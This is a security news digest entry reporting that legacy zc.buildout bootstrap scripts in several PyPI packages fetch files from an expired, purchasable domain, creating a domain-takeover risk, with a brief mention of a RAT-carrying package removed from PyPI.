Legacy Python Bootstrap Scripts Pose Domain-Takeover Risk in PyPI Packages

First reported

28.11.2025 18:27

Last updated

1 unique sources, 1 articles

Summary

Hide ▲

Researchers discovered vulnerable legacy Python bootstrap scripts in multiple PyPI packages that could enable domain-takeover attacks. The scripts fetch installation files from a defunct domain (python-distribute.org), now available for purchase, potentially allowing attackers to serve malicious code. Affected packages include tornado, pypiserver, slapos.core, roman, xlutils, and testfixtures. While some packages have removed the vulnerable scripts, others like slapos.core still include them, posing a latent risk to users who might execute the scripts.

Timeline

28.11.2025 18:27 1 articles · 23h ago

Legacy Python Bootstrap Scripts Pose Domain-Takeover Risk in PyPI Packages
Researchers discovered vulnerable legacy Python bootstrap scripts in multiple PyPI packages that could enable domain-takeover attacks. The scripts fetch installation files from a defunct domain (python-distribute.org), now available for purchase, potentially allowing attackers to serve malicious code. Affected packages include tornado, pypiserver, slapos.core, roman, xlutils, and testfixtures. While some packages have removed the vulnerable scripts, others like slapos.core still include them, posing a latent risk to users who might execute the scripts.
Show sources

Legacy Python Bootstrap Scripts Create Domain-Takeover Risk in Multiple PyPI Packages — thehackernews.com — 28.11.2025 18:27
Open in new tab

Information Snippets

The vulnerability lies in bootstrap scripts used with the zc.buildout tool, which fetch installation scripts from the defunct domain python-distribute.org.
First reported: 28.11.2025 18:27

1 source, 1 article
Show sources
- Legacy Python Bootstrap Scripts Create Domain-Takeover Risk in Multiple PyPI Packages — thehackernews.com — 28.11.2025 18:27
The domain python-distribute.org has been up for sale since 2014, making it a potential target for domain takeover.
First reported: 28.11.2025 18:27

1 source, 1 article
Show sources
- Legacy Python Bootstrap Scripts Create Domain-Takeover Risk in Multiple PyPI Packages — thehackernews.com — 28.11.2025 18:27
Affected PyPI packages include tornado, pypiserver, slapos.core, roman, xlutils, and testfixtures.
First reported: 28.11.2025 18:27

1 source, 1 article
Show sources
- Legacy Python Bootstrap Scripts Create Domain-Takeover Risk in Multiple PyPI Packages — thehackernews.com — 28.11.2025 18:27
The bootstrap script is written in Python 2 and cannot be executed with Python 3 without modifications.
First reported: 28.11.2025 18:27

1 source, 1 article
Show sources
- Legacy Python Bootstrap Scripts Create Domain-Takeover Risk in Multiple PyPI Packages — thehackernews.com — 28.11.2025 18:27
The slapos.core package still includes the vulnerable bootstrap script, while others have removed it.
First reported: 28.11.2025 18:27

1 source, 1 article
Show sources
- Legacy Python Bootstrap Scripts Create Domain-Takeover Risk in Multiple PyPI Packages — thehackernews.com — 28.11.2025 18:27
A malicious PyPI package named 'spellcheckers' was discovered, which installs a remote access trojan (RAT) and has been downloaded 955 times before being removed.
First reported: 28.11.2025 18:27

1 source, 1 article
Show sources
- Legacy Python Bootstrap Scripts Create Domain-Takeover Risk in Multiple PyPI Packages — thehackernews.com — 28.11.2025 18:27